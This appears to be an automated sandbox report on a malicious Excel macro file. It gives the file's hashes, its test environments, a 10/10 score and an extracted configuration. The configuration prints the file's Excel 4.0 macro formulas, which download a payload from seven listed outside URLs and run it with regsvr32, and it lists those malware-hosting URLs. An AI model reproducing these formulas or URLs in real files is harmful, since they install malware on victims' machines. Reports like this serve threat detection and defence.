General
-
Target
0adba2e4d91e97ebf67345599a48bd0ebc0a88093958cca48cf18ce43d735da9
-
Size
35KB
-
Sample
241120-n9f4rs1ldr
-
MD5
3cd80c3b4f7b342ea307eb53c4c3ceeb
-
SHA1
41ddb2127de3abb84d316ca9fa2d6471689b895a
-
SHA256
0adba2e4d91e97ebf67345599a48bd0ebc0a88093958cca48cf18ce43d735da9
-
SHA512
81bd58d8ac11e5896d3cbbef9232987764255dbe53f1c3f94588e9f281591e68093ff75cf99536e3eabeab5c840ac9b18480a46f6a8e5c06fc4cefc37660b0cc
-
SSDEEP
768:KYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:KYKtmg+UOZZ1ZYpoQ/pMAm
Behavioral task
behavioral1
Sample
0adba2e4d91e97ebf67345599a48bd0ebc0a88093958cca48cf18ce43d735da9.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0adba2e4d91e97ebf67345599a48bd0ebc0a88093958cca48cf18ce43d735da9.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
https://deatravel.al/wp-includes/H544R/
https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/
https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/
https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casinojackpotking.com/cgi-bin/47sKbklSQf31/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://directorkay.com.ng/wp-admin/MYP3NA/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deatravel.al/wp-includes/H544R/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
https://deatravel.al/wp-includes/H544R/
https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/
https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/
https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
Targets
-
-
Target
0adba2e4d91e97ebf67345599a48bd0ebc0a88093958cca48cf18ce43d735da9
-
Size
35KB
-
MD5
3cd80c3b4f7b342ea307eb53c4c3ceeb
-
SHA1
41ddb2127de3abb84d316ca9fa2d6471689b895a
-
SHA256
0adba2e4d91e97ebf67345599a48bd0ebc0a88093958cca48cf18ce43d735da9
-
SHA512
81bd58d8ac11e5896d3cbbef9232987764255dbe53f1c3f94588e9f281591e68093ff75cf99536e3eabeab5c840ac9b18480a46f6a8e5c06fc4cefc37660b0cc
-
SSDEEP
768:KYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:KYKtmg+UOZZ1ZYpoQ/pMAm
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-